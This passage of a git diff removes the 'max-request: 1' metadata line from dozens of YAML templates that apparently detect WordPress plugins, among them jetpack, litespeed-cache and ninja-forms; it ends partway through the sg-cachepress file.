a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 829edad042..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ 